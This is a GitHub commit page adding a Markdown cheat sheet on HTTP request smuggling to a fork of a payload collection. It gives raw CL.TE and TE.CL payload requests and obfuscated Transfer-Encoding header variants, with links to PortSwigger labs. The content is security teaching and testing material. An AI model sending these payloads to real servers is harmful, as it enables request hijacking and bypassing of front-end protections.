forked from swisskyrepo/PayloadsAllTheThings
-
Notifications
You must be signed in to change notification settings - Fork 0
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
1 parent
75a0f34
commit f431ea7
Showing
1 changed file
with
103 additions
and
0 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,103 @@ | ||
| # Request Smuggling | ||
|
|
||
| ## Summary | ||
|
|
||
| * [CL.TE vulnerabilities](#cl.te-vulnerabilities) | ||
| * [TE.CL vulnerabilities](#te.cl-vulnerabilities) | ||
| * [TE.TE behavior: obfuscating the TE header](#te.te-behavior-obfuscating-the-te-header) | ||
| * [References](#references) | ||
|
|
||
|
|
||
| ## CL.TE vulnerabilities | ||
|
|
||
| > The front-end server uses the Content-Length header and the back-end server uses the Transfer-Encoding header. | ||
| ```powershell | ||
| POST / HTTP/1.1 | ||
| Host: vulnerable-website.com | ||
| Content-Length: 13 | ||
| Transfer-Encoding: chunked | ||
| 0 | ||
| SMUGGLED | ||
| ``` | ||
|
|
||
| Example: | ||
|
|
||
| ```powershell | ||
| POST / HTTP/1.1 | ||
| Host: domain.example.com | ||
| Connection: keep-alive | ||
| Content-Type: application/x-www-form-urlencoded | ||
| Content-Length: 6 | ||
| Transfer-Encoding: chunked | ||
| 0 | ||
| G | ||
| ``` | ||
|
|
||
| Challenge: https://portswigger.net/web-security/request-smuggling/lab-basic-cl-te | ||
|
|
||
| ## TE.CL vulnerabilities | ||
|
|
||
| > The front-end server uses the Transfer-Encoding header and the back-end server uses the Content-Length header. | ||
| ```powershell | ||
| POST / HTTP/1.1 | ||
| Host: vulnerable-website.com | ||
| Content-Length: 3 | ||
| Transfer-Encoding: chunked | ||
| 8 | ||
| SMUGGLED | ||
| 0 | ||
| ``` | ||
|
|
||
| Example: | ||
|
|
||
| ```powershell | ||
| POST / HTTP/1.1 | ||
| Host: domain.example.com | ||
| User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 | ||
| Content-Length: 4 | ||
| Connection: close | ||
| Content-Type: application/x-www-form-urlencoded | ||
| Accept-Encoding: gzip, deflate | ||
| 5c | ||
| GPOST / HTTP/1.1 | ||
| Content-Type: application/x-www-form-urlencoded | ||
| Content-Length: 15 | ||
| x=1 | ||
| 0 | ||
| ``` | ||
|
|
||
| :warning: To send this request using Burp Repeater, you will first need to go to the Repeater menu and ensure that the "Update Content-Length" option is unchecked.You need to include the trailing sequence \r\n\r\n following the final 0. | ||
|
|
||
| Challenge: https://portswigger.net/web-security/request-smuggling/lab-basic-te-cl | ||
|
|
||
| ## TE.TE behavior: obfuscating the TE header | ||
|
|
||
| > The front-end and back-end servers both support the Transfer-Encoding header, but one of the servers can be induced not to process it by obfuscating the header in some way. | ||
| ```powershell | ||
| Transfer-Encoding: xchunked | ||
| Transfer-Encoding : chunked | ||
| Transfer-Encoding: chunked | ||
| Transfer-Encoding: x | ||
| Transfer-Encoding:[tab]chunked | ||
| [space]Transfer-Encoding: chunked | ||
| X: X[\n]Transfer-Encoding: chunked | ||
| Transfer-Encoding | ||
| : chunked | ||
| ``` | ||
|
|
||
| Challenge: https://portswigger.net/web-security/request-smuggling/lab-ofuscating-te-header | ||
|
|
||
| ## References | ||
|
|
||
| * [PortSwigger - Request Smuggling](https://portswigger.net/web-security/request-smuggling) |